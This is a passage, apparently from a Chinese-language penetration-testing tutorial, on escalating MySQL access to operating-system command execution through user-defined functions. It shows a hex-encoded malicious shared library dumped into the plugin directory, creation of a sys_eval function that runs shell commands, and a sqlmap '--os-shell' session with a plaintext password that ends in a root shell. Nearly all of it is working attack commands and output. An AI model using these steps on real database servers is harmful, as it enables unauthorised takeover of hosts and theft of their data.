65696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400') into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.01 sec)#需要有/usr/lib64/mysql/plugin/目录的写入权限

mysql> create function sys_eval returns string soname 'mysqludf.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql
             |
+--------------------+
1 row in set (0.03 sec)

mysql> select * from func;
+----------+-----+-------------+----------+
| name     | ret | dl          | type     |
+----------+-----+-------------+----------+
| sys_eval |   0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set (0.00 sec)

mysql> drop function sys_eval;
Query OK, 0 rows affected (0.00 sec)

mysql> select * from func;
Empty set (0.00 sec)

 

限制条件:

1)mysql root账号弱口令

2)mysql启动账户需要有插件目录的写入权限,例如yum安装的mysql

[root@template tmp]# ls -ald /usr/lib64/mysql/plugin

drwxr-xr-x. 2 root root 4096 4月  25 08:33 /usr/lib64/mysql/plugin

而mysql的默认启动账户是mysql,是没有写入权限的。

 

另外UDF提权可以直接使用sqlmap -d参数执行
语法为:” DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME” 或者是”DBMS://DATABASE_FILEPATH”。
[1]dbms:代表所使用的数据库,如我们这里是mysql
[2]user:对应我们数据库的用户,如我们这里是root
[3]password:对应我们数据的密码,如我的服务器为Hehe123456
[4]dbma_IP:数据库服务器对应的ip地址,如我这里为192.168.192.120
[5]dbms_PORT:数据服务器所使用的端口
[6]database_NAME:你要使用的数据库名

这里直接使用Kali下的Sqlmap验证:

root@kali:~# sqlmap -d "mysql://root:Hehe123456@192.168.192.120:3306/test" --os-shell
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.3#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:56:51

[16:56:51] [INFO] connection to mysql server 192.168.192.120:3306 established
[16:56:51] [INFO] testing MySQL
[16:56:51] [INFO] confirming MySQL
[16:56:51] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[16:56:51] [INFO] fingerprinting the back-end DBMS operating system
[16:56:51] [INFO] the back-end DBMS operating system is Linux
[16:56:51] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfile'")
[16:56:51] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfilehex'")
[16:56:51] [INFO] testing if current user is DBA
[16:56:51] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[16:56:57] [INFO] checking if UDF 'sys_eval' already exist
[16:56:57] [INFO] checking if UDF 'sys_exec' already exist
[16:56:57] [INFO] detecting back-end DBMS version from its banner
[16:56:57] [INFO] retrieving MySQL plugin directory absolute path
[16:56:57] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfile'")
[16:56:58] [INFO] the local file '/tmp/sqlmap6szFlF1831/lib_mysqludf_syswZxteE.so' and the remote file '/usr/lib64/mysql/plugin/libsmuur.so' have the same size (8040 B)
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfilehex'")
[16:56:58] [INFO] creating UDF 'sys_eval' from the binary UDF file
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1305, 'FUNCTION test.sys_eval does not exist')
[16:56:58] [INFO] creating UDF 'sys_exec' from the binary UDF file
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1305, 'FUNCTION test.sys_exec does not exist')
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapoutput'")
[16:56:58] [INFO] going to use injected sys_eval and sys_exec user-defined functions for operating system command execution
[16:56:58] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output:    'root'